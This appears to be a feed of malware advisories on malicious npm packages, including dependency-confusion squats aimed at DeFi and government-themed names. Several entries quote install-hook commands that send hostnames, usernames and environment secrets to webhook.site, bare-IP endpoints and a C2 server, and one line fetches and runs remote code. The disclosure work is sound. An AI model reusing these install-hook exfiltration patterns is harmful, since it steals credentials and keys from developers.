Malicious code in uidai_reusable_components (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5875a720dc1cfc6e30a67b003fc43975fbef2e11352e715e19e55e54dd84ae67 On npm install, the preinstall lifecycle script in package.json executes an inline Node one-liner that collects the installer's hostname, OS username...

Malicious code in dms-backend (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e package.json declares a preinstall lifecycle script that runs curl --data-urlencode "info=$hostname && whoami && pwd" against a webhook.site collecto...

Malicious code in ogd-platform (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f17f2c263db2adee12698bd9046668b9b674bcdf063b959f54841914a6028931 The package contains only a package.json with a preinstall lifecycle script and ships no actual functionality despite advertising itself as an 'Open...

MAL-2026-5828 Malicious code in ogd-platform (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f17f2c263db2adee12698bd9046668b9b674bcdf063b959f54841914a6028931 The package contains only a package.json with a preinstall lifecycle script and ships no actual functionality despite advertising itself as an 'Open...

Malicious code in vend-utilities (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 89ed34c4d09a0f8bb373f141d18157203eb73efec9461434a7957dfe17ba72f1 package.json declares preinstall: node index.js, causing index.js to run automatically on npm install. The script collects installer host identity...

MAL-2026-5804 Malicious code in flow-lending-sdk (npm)

Continuation of the flow/surf-lending DeFi cred-exfil campaign c1655. Sentinel-9.9.9 depconf squat; preinstall node index.js || true exfils env secrets mnemonic/private-key/blockfrost to raw C2 2.25.140.71:8443/surflending/npm-confusion same C2. Companions bodega-sdk/flowdefi verified identical...

MAL-2026-5808 Malicious code in surf-lending (npm)

Sibling of [email protected] campaign C2 path /surflending/. Sentinel-9.9.9 dep-confusion squat; preinstall node index.js || true exfils env secrets mnemonic/key/token/blockfrost to raw C2 2.25.140.71:8443/surflending/npm-confusion. c913 + c252. --- -= Per source details. Do not edit below this...

Malicious code in surf-lending (npm)

Sibling of [email protected] campaign C2 path /surflending/. Sentinel-9.9.9 dep-confusion squat; preinstall node index.js || true exfils env secrets mnemonic/key/token/blockfrost to raw C2 2.25.140.71:8443/surflending/npm-confusion. c913 + c252. --- -= Per source details. Do not edit below this...

MAL-2026-5801 Malicious code in bodega-sdk (npm)

flow/surf-lending DeFi cred-exfil campaign sibling c1655. preinstall node index.js || true exfils env secrets to raw C2 2.25.140.71:8443/surflending/npm-confusion verified identical. No-renotify. --- -= Per source details. Do not edit below this line.=- Source: amazon-inspector...

MAL-2026-5777 Malicious code in field-plus (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0112dc4801bb261e86a2f68d5fd49b6c955bb4e82f872c72e61e49cc638ca91c package.json declares both preinstall and postinstall scripts that run curl against a hardcoded bare-IP HTTP endpoint http://3.7.226.146:9000/callbac...

MAL-2026-5782 Malicious code in token-prices-cron (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 10adc862166a2dbaf26f3dc56b4c1dfa0fd45e625f713380564d0b18fb07088d On npm install, the preinstall lifecycle script in postinstall.js enumerates process.env, filters keys matching a broad credential regex...

Malicious code in hemi-earn-actions (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a9c2a72c75e835bc78738de0839bd4727df93d6bcb8aed2215289973996c4f3c On npm install, the package's preinstall script postinstall.js collects host metadata hostname, username, cwd, npm config and iterates process.env,...

Malicious code in unicocheck-ios (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bafc91c569cf42c5f1ff68531a8d5238919f595368ffa90b7d4e5bcc74fe9788 package.json declares a preinstall lifecycle script that runs curl against https://webhook.site/fe1246c2-ac04-4493-b223-fe34ba26b79f with query...

MAL-2026-5831 Malicious code in unicocheck-ios (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bafc91c569cf42c5f1ff68531a8d5238919f595368ffa90b7d4e5bcc74fe9788 package.json declares a preinstall lifecycle script that runs curl against https://webhook.site/fe1246c2-ac04-4493-b223-fe34ba26b79f with query...

Malicious code in nic-datagov (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 89be7e0ea4d164dad90f5476041928d54d5502a066e22d501373e1bbf9dc8bbf package.json declares a preinstall script that runs curl --data-urlencode "info=$hostname && whoami && pwd"...

MAL-2026-5836 Malicious code in nic-datagov (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 89be7e0ea4d164dad90f5476041928d54d5502a066e22d501373e1bbf9dc8bbf package.json declares a preinstall script that runs curl --data-urlencode "info=$hostname && whoami && pwd"...

MAL-2026-5747 Malicious code in @giftyhq/widget-components (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8ad3f12a6a12fbfa60e4a72747df6974f89906200568926b99a8c93c489b5e62 package.json declares "preinstall": "node index.js", which fires automatically on npm install. index.js collects host fingerprinting data —...

Malicious code in xy-shared (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d631443367624273d8b7d3347b2e173a72f3f7447424f25424dab8e68c4b1a25 package.json wires both preinstall and postinstall to node callback.js, which auto-executes on npm install. callback.js collects username, uid/gid,...

MAL-2026-5736 Malicious code in node-stack-frames (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5fd4f6c5f3278484d99f6ffffc001cf920dcb0fa4fdfabff957a61c3cfbfc158 package.json declares a preinstall script that runs an inline Node program on npm install. The script requires os and http, collects os.hostname,...

Malicious code in sn-internal-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install...